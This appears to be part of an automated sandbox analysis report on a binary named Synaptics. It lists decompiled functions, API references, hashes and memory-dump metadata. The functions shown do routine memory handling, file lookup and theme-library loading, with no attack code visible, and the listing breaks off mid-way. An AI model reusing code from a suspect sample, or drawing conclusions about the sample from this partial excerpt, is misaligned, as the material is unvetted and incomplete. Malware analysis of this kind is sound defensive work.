                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FolderLocationSpecial
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3328827890-0
                                                                                                                                                                                          • Opcode ID: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                          • Instruction ID: ef8edf6798076d0a212359ae3af47a46da83506bc8f37cce848a45b11e0c3a11
                                                                                                                                                                                          • Opcode Fuzzy Hash: a22953724ced97bec980e9ad6ab0f70e644ba08d145622cf2bd1aee856a51c4c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02C09BB13150045AD204AB49FD47F97335CD754345F500519F4D4CA154D354A9005EA6
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00409B90 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00409B90(void* __eax) {
				void* _t4;
				int _t5;
				void* _t6;

				_t6 = __eax;
				_t4 =  *(__eax + 0x14);
				if(_t4 != 0xffffffff) {
					_t5 = FindClose(_t4); // executed
					 *((intOrPtr*)(_t6 + 0x14)) = 0xffffffff;
					return _t5;
				}
				return _t4;
			}






                                                                                                                                                                                          0x00409b91
                                                                                                                                                                                          0x00409b93
                                                                                                                                                                                          0x00409b99
                                                                                                                                                                                          0x00409b9c
                                                                                                                                                                                          0x00409ba1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00409ba1
                                                                                                                                                                                          0x00409ba9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • FindClose.KERNEL32(?,?,00409B5A,00000000,?,?,00000000,?,004760AE,00000000,004761BC,?,00000000,?,004964CE), ref: 00409B9C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseFind
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1863332320-0
                                                                                                                                                                                          • Opcode ID: 99888715bf3a02bd9988c32a6467eea3308d7079af00a1817e66b89c69e3dcfb
                                                                                                                                                                                          • Instruction ID: dfd6d39c8543c627b79b6cb084a4c3329f7e284b48324a05c8a470c5499769dc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 99888715bf3a02bd9988c32a6467eea3308d7079af00a1817e66b89c69e3dcfb
                                                                                                                                                                                          • Instruction Fuzzy Hash: CCC09BB05056004BCB149E7DA9C490736996F053363600755F434EB3D7D739DC614665
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00401748 Relevance: 1.3, APIs: 1, Instructions: 54memoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00401748(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0x49e5ec; // 0x7f3db4
				while(_t29 != 0x49e5ec) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}












                                                                                                                                                                                          0x0040174f
                                                                                                                                                                                          0x00401753
                                                                                                                                                                                          0x0040175a
                                                                                                                                                                                          0x0040176f
                                                                                                                                                                                          0x00401777
                                                                                                                                                                                          0x0040177d
                                                                                                                                                                                          0x00401783
                                                                                                                                                                                          0x00401786
                                                                                                                                                                                          0x004017ca
                                                                                                                                                                                          0x0040178e
                                                                                                                                                                                          0x00401794
                                                                                                                                                                                          0x00401798
                                                                                                                                                                                          0x0040179a
                                                                                                                                                                                          0x0040179a
                                                                                                                                                                                          0x004017a0
                                                                                                                                                                                          0x004017a2
                                                                                                                                                                                          0x004017a2
                                                                                                                                                                                          0x004017a8
                                                                                                                                                                                          0x004017b5
                                                                                                                                                                                          0x004017bc
                                                                                                                                                                                          0x004017be
                                                                                                                                                                                          0x004017c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004017c4
                                                                                                                                                                                          0x004017bc
                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                          0x004017c8
                                                                                                                                                                                          0x004017d9

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 004017B5
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AllocVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 4275171209-0
                                                                                                                                                                                          • Opcode ID: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                          • Instruction ID: d74b7ebcb609947181d21bffa9b817de474e90391ed7449ce6f0c7caa409c1d9
                                                                                                                                                                                          • Opcode Fuzzy Hash: a7729a2a40d84c19509578ac64f8ad731e2a19a7efc197d915124daa5f5ca19a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 16117C76A04705ABC310DF29C880A2BBBE5EBC4764F15C53EE598A73A4E734AC408A49
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004017DC Relevance: 1.3, APIs: 1, Instructions: 48COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 93%
                                                                                                                                                                                          			E004017DC(void* __eax, void** __ecx, void* __edx) {
				int _t7;
				void* _t9;
				signed int _t14;
				intOrPtr* _t19;
				signed int _t22;
				void** _t23;

				_push(__ecx);
				 *_t23 = __eax + 0x00000fff & 0xfffff000;
				_t22 = __eax + __edx & 0xfffff000;
				 *__ecx =  *_t23;
				_t7 = _t22 -  *_t23;
				__ecx[1] = _t7;
				_t19 =  *0x49e5ec; // 0x7f3db4
				while(_t19 != 0x49e5ec) {
					_t9 =  *(_t19 + 8);
					_t14 =  *((intOrPtr*)(_t19 + 0xc)) + _t9;
					if(_t9 <  *_t23) {
						_t9 =  *_t23;
					}
					if(_t22 < _t14) {
						_t14 = _t22;
					}
					if(_t14 > _t9) {
						_t7 = VirtualFree(_t9, _t14 - _t9, 0x4000); // executed
						if(_t7 == 0) {
							 *0x49e5c8 = 2;
						}
					}
					_t19 =  *_t19;
				}
				return _t7;
			}









                                                                                                                                                                                          0x004017e0
                                                                                                                                                                                          0x004017f1
                                                                                                                                                                                          0x004017f8
                                                                                                                                                                                          0x00401801
                                                                                                                                                                                          0x00401805
                                                                                                                                                                                          0x00401808
                                                                                                                                                                                          0x0040180b
                                                                                                                                                                                          0x0040184b
                                                                                                                                                                                          0x00401813
                                                                                                                                                                                          0x00401819
                                                                                                                                                                                          0x0040181e
                                                                                                                                                                                          0x00401820
                                                                                                                                                                                          0x00401820
                                                                                                                                                                                          0x00401825
                                                                                                                                                                                          0x00401827
                                                                                                                                                                                          0x00401827
                                                                                                                                                                                          0x0040182b
                                                                                                                                                                                          0x00401836
                                                                                                                                                                                          0x0040183d
                                                                                                                                                                                          0x0040183f
                                                                                                                                                                                          0x0040183f
                                                                                                                                                                                          0x0040183d
                                                                                                                                                                                          0x00401849
                                                                                                                                                                                          0x00401849
                                                                                                                                                                                          0x00401858

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • VirtualFree.KERNEL32(?,?,00004000,?,?,?,3A6E6967,3A6EA96A,00401A43), ref: 00401836
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FreeVirtual
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1263568516-0
                                                                                                                                                                                          • Opcode ID: d7c6500f5d3801a8b9b34041ee5aed51e9410981a664e70847f93330d21bca7c
                                                                                                                                                                                          • Instruction ID: 69a851a612f8e5332c3ed32b0bddb0d6c77ed4967d0166fa3b232cf3dee9e35f
                                                                                                                                                                                          • Opcode Fuzzy Hash: d7c6500f5d3801a8b9b34041ee5aed51e9410981a664e70847f93330d21bca7c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4201FC73A043105BD310EE59DCC0A1777E8E795338F15853ED98467391D33AAD0187D8
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Non-executed Functions

                                                                                                                                                                                          Function 0042E3B4 Relevance: 166.5, APIs: 48, Strings: 47, Instructions: 266libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 90%
                                                                                                                                                                                          			E0042E3B4(void* __ebx, void* __ecx) {
				char _v5;
				intOrPtr _t2;
				intOrPtr _t6;
				intOrPtr _t108;
				intOrPtr _t111;

				_t2 =  *0x49ea48; // 0x22b0dc8
				E0042E1AC(_t2);
				_push(_t111);
				_push(0x42e767);
				_push( *[fs:eax]);
				 *[fs:eax] = _t111;
				 *0x49ea44 =  *0x49ea44 + 1;
				if( *0x49ea40 == 0) {
					 *0x49ea40 = LoadLibraryA("uxtheme.dll");
					if( *0x49ea40 > 0) {
						 *0x49e980 = GetProcAddress( *0x49ea40, "OpenThemeData");
						 *0x49e984 = GetProcAddress( *0x49ea40, "CloseThemeData");
						 *0x49e988 = GetProcAddress( *0x49ea40, "DrawThemeBackground");
						 *0x49e98c = GetProcAddress( *0x49ea40, "DrawThemeText");
						 *0x49e990 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e994 = GetProcAddress( *0x49ea40, "GetThemeBackgroundContentRect");
						 *0x49e998 = GetProcAddress( *0x49ea40, "GetThemePartSize");
						 *0x49e99c = GetProcAddress( *0x49ea40, "GetThemeTextExtent");
						 *0x49e9a0 = GetProcAddress( *0x49ea40, "GetThemeTextMetrics");
						 *0x49e9a4 = GetProcAddress( *0x49ea40, "GetThemeBackgroundRegion");
						 *0x49e9a8 = GetProcAddress( *0x49ea40, "HitTestThemeBackground");
						 *0x49e9ac = GetProcAddress( *0x49ea40, "DrawThemeEdge");
						 *0x49e9b0 = GetProcAddress( *0x49ea40, "DrawThemeIcon");
						 *0x49e9b4 = GetProcAddress( *0x49ea40, "IsThemePartDefined");
						 *0x49e9b8 = GetProcAddress( *0x49ea40, "IsThemeBackgroundPartiallyTransparent");
						 *0x49e9bc = GetProcAddress( *0x49ea40, "GetThemeColor");
						 *0x49e9c0 = GetProcAddress( *0x49ea40, "GetThemeMetric");
						 *0x49e9c4 = GetProcAddress( *0x49ea40, "GetThemeString");
						 *0x49e9c8 = GetProcAddress( *0x49ea40, "GetThemeBool");
						 *0x49e9cc = GetProcAddress( *0x49ea40, "GetThemeInt");
						 *0x49e9d0 = GetProcAddress( *0x49ea40, "GetThemeEnumValue");
						 *0x49e9d4 = GetProcAddress( *0x49ea40, "GetThemePosition");
						 *0x49e9d8 = GetProcAddress( *0x49ea40, "GetThemeFont");
						 *0x49e9dc = GetProcAddress( *0x49ea40, "GetThemeRect");
						 *0x49e9e0 = GetProcAddress( *0x49ea40, "GetThemeMargins");
						 *0x49e9e4 = GetProcAddress( *0x49ea40, "GetThemeIntList");
						 *0x49e9e8 = GetProcAddress( *0x49ea40, "GetThemePropertyOrigin");
						 *0x49e9ec = GetProcAddress( *0x49ea40, "SetWindowTheme");
						 *0x49e9f0 = GetProcAddress( *0x49ea40, "GetThemeFilename");
						 *0x49e9f4 = GetProcAddress( *0x49ea40, "GetThemeSysColor");
						 *0x49e9f8 = GetProcAddress( *0x49ea40, "GetThemeSysColorBrush");
						 *0x49e9fc = GetProcAddress( *0x49ea40, "GetThemeSysBool");
						 *0x49ea00 = GetProcAddress( *0x49ea40, "GetThemeSysSize");
						 *0x49ea04 = GetProcAddress( *0x49ea40, "GetThemeSysFont");
						 *0x49ea08 = GetProcAddress( *0x49ea40, "GetThemeSysString");
						 *0x49ea0c = GetProcAddress( *0x49ea40, "GetThemeSysInt");
						 *0x49ea10 = GetProcAddress( *0x49ea40, "IsThemeActive");
						 *0x49ea14 = GetProcAddress( *0x49ea40, "IsAppThemed");
						 *0x49ea18 = GetProcAddress( *0x49ea40, "GetWindowTheme");
						 *0x49ea1c = GetProcAddress( *0x49ea40, "EnableThemeDialogTexture");
						 *0x49ea20 = GetProcAddress( *0x49ea40, "IsThemeDialogTextureEnabled");
						 *0x49ea24 = GetProcAddress( *0x49ea40, "GetThemeAppProperties");
						 *0x49ea28 = GetProcAddress( *0x49ea40, "SetThemeAppProperties");
						 *0x49ea2c = GetProcAddress( *0x49ea40, "GetCurrentThemeName");
						 *0x49ea30 = GetProcAddress( *0x49ea40, "GetThemeDocumentationProperty");
						 *0x49ea34 = GetProcAddress( *0x49ea40, "DrawThemeParentBackground");
						 *0x49ea38 = GetProcAddress( *0x49ea40, "EnableTheming");
					}
				}
				_v5 =  *0x49ea40 > 0;
				_pop(_t108);
				 *[fs:eax] = _t108;
				_push(0x42e76e);
				_t6 =  *0x49ea48; // 0x22b0dc8
				return E0042E1B4(_t6);
			}








                                                                                                                                                                                          0x0042e3be
                                                                                                                                                                                          0x0042e3c3
                                                                                                                                                                                          0x0042e3ca
                                                                                                                                                                                          0x0042e3cb
                                                                                                                                                                                          0x0042e3d0
                                                                                                                                                                                          0x0042e3d3
                                                                                                                                                                                          0x0042e3d6
                                                                                                                                                                                          0x0042e3df
                                                                                                                                                                                          0x0042e3ef
                                                                                                                                                                                          0x0042e3f4
                                                                                                                                                                                          0x0042e407
                                                                                                                                                                                          0x0042e419
                                                                                                                                                                                          0x0042e42b
                                                                                                                                                                                          0x0042e43d
                                                                                                                                                                                          0x0042e44f
                                                                                                                                                                                          0x0042e461
                                                                                                                                                                                          0x0042e473
                                                                                                                                                                                          0x0042e485
                                                                                                                                                                                          0x0042e497
                                                                                                                                                                                          0x0042e4a9
                                                                                                                                                                                          0x0042e4bb
                                                                                                                                                                                          0x0042e4cd
                                                                                                                                                                                          0x0042e4df
                                                                                                                                                                                          0x0042e4f1
                                                                                                                                                                                          0x0042e503
                                                                                                                                                                                          0x0042e515
                                                                                                                                                                                          0x0042e527
                                                                                                                                                                                          0x0042e539
                                                                                                                                                                                          0x0042e54b
                                                                                                                                                                                          0x0042e55d
                                                                                                                                                                                          0x0042e56f
                                                                                                                                                                                          0x0042e581
                                                                                                                                                                                          0x0042e593
                                                                                                                                                                                          0x0042e5a5
                                                                                                                                                                                          0x0042e5b7
                                                                                                                                                                                          0x0042e5c9
                                                                                                                                                                                          0x0042e5db
                                                                                                                                                                                          0x0042e5ed
                                                                                                                                                                                          0x0042e5ff
                                                                                                                                                                                          0x0042e611
                                                                                                                                                                                          0x0042e623
                                                                                                                                                                                          0x0042e635
                                                                                                                                                                                          0x0042e647
                                                                                                                                                                                          0x0042e659
                                                                                                                                                                                          0x0042e66b
                                                                                                                                                                                          0x0042e67d
                                                                                                                                                                                          0x0042e68f
                                                                                                                                                                                          0x0042e6a1
                                                                                                                                                                                          0x0042e6b3
                                                                                                                                                                                          0x0042e6c5
                                                                                                                                                                                          0x0042e6d7
                                                                                                                                                                                          0x0042e6e9
                                                                                                                                                                                          0x0042e6fb
                                                                                                                                                                                          0x0042e70d
                                                                                                                                                                                          0x0042e71f
                                                                                                                                                                                          0x0042e731
                                                                                                                                                                                          0x0042e743
                                                                                                                                                                                          0x0042e743
                                                                                                                                                                                          0x0042e3f4
                                                                                                                                                                                          0x0042e74b
                                                                                                                                                                                          0x0042e751
                                                                                                                                                                                          0x0042e754
                                                                                                                                                                                          0x0042e757
                                                                                                                                                                                          0x0042e75c
                                                                                                                                                                                          0x0042e766

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(uxtheme.dll,00000000,0042E767), ref: 0042E3EA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,OpenThemeData), ref: 0042E402
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,CloseThemeData), ref: 0042E414
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeBackground), ref: 0042E426
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeText), ref: 0042E438
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E44A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundContentRect), ref: 0042E45C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePartSize), ref: 0042E46E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextExtent), ref: 0042E480
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeTextMetrics), ref: 0042E492
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBackgroundRegion), ref: 0042E4A4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,HitTestThemeBackground), ref: 0042E4B6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeEdge), ref: 0042E4C8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeIcon), ref: 0042E4DA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemePartDefined), ref: 0042E4EC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeBackgroundPartiallyTransparent), ref: 0042E4FE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeColor), ref: 0042E510
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMetric), ref: 0042E522
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeString), ref: 0042E534
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeBool), ref: 0042E546
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeInt), ref: 0042E558
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeEnumValue), ref: 0042E56A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePosition), ref: 0042E57C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFont), ref: 0042E58E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeRect), ref: 0042E5A0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeMargins), ref: 0042E5B2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeIntList), ref: 0042E5C4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemePropertyOrigin), ref: 0042E5D6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetWindowTheme), ref: 0042E5E8
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeFilename), ref: 0042E5FA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColor), ref: 0042E60C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysColorBrush), ref: 0042E61E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysBool), ref: 0042E630
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysSize), ref: 0042E642
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysFont), ref: 0042E654
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysString), ref: 0042E666
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeSysInt), ref: 0042E678
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0042E68A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 0042E69C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetWindowTheme), ref: 0042E6AE
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnableThemeDialogTexture), ref: 0042E6C0
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeDialogTextureEnabled), ref: 0042E6D2
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeAppProperties), ref: 0042E6E4
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetThemeAppProperties), ref: 0042E6F6
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetCurrentThemeName), ref: 0042E708
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetThemeDocumentationProperty), ref: 0042E71A
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,DrawThemeParentBackground), ref: 0042E72C
                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnableTheming), ref: 0042E73E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000002.00000002.495377575.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000002.00000002.494336457.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497313408.000000000049B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000002.00000002.497359973.00000000004A5000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Synaptics.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID: CloseThemeData$DrawThemeBackground$DrawThemeEdge$DrawThemeIcon$DrawThemeParentBackground$DrawThemeText$EnableThemeDialogTexture$EnableTheming$GetCurrentThemeName$GetThemeAppProperties$GetThemeBackgroundContentRect$GetThemeBackgroundRegion$GetThemeBool$GetThemeColor$GetThemeDocumentationProperty$GetThemeEnumValue$GetThemeFilename$GetThemeFont$GetThemeInt$GetThemeIntList$GetThemeMargins$GetThemeMetric$GetThemePartSize$GetThemePosition$GetThemePropertyOrigin$GetThemeRect$GetThemeString$GetThemeSysBool$GetThemeSysColor$GetThemeSysColorBrush$GetThemeSysFont$GetThemeSysInt$GetThemeSysSize$GetThemeSysString$GetThemeTextExtent$GetThemeTextMetrics$GetWindowTheme$HitTestThemeBackground$IsAppThemed$IsThemeActive$IsThemeBackgroundPartiallyTransparent$IsThemeDialogTextureEnabled$IsThemePartDefined$OpenThemeData$SetThemeAppProperties$SetWindowTheme$uxtheme.dll
                                                                                                                                                                                          • API String ID: 2238633743-2910565190
                                                                                                                                                                                          • Opcode ID: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                          • Instruction ID: 583b1748ec7c75dcc55376f1719c3b0464f23e6b29e7b95583f9f44409200d59
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8d86ba1094030d790a56e86b91411d8c7853f90e04823d3f43234c390784be56
                                                                                                                                                                                          • Instruction Fuzzy Hash: 08A1F2B0F48660AFDB00EB67EC96B2637A8EB15704350467BB400DF696D67DA8009B5E
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00406018 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 53%
                                                                                                                                                                                          			E00406018(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00406004(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00406004(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L0040131C();
									while( *_t93 != 0) {
										_t90 = E00406004(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L0040131C();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401324();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L0040131C();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401324();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L0040131C();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L0040131C();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                                                                                                                          0x00406024
                                                                                                                                                                                          0x00406027
                                                                                                                                                                                          0x0040602d
                                                                                                                                                                                          0x0040603a
                                                                                                                                                                                          0x0040603e
                                                                                                                                                                                          0x00406080
                                                                                                                                                                                          0x00406086
                                                                                                                                                                                          0x004060c3
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00406088
                                                                                                                                                                                          0x0040608f
                                                                                                                                                                                          0x004060a0
                                                                                                                                                                                          0x004060a5
                                                                                                                                                                                          0x004060ab
                                                                                                                                                                                          0x004060b3
                                                                                                                                                                                          0x004060b8
                                                                                                                                                                                          0x004060c6
                                                                                                                                                                                          0x004060c8
                                                                                                                                                                                          0x004060ce
                                                                                                                                                                                          0x004060d2
                                                                                                                                                                                          0x004060d9
                                                                                                                                                                                          0x004060da
                                                                                                                                                                                          0x00406185
                                                                                                                                                                                          0x004060ec
                                                                                                                                                                                          0x004060f0
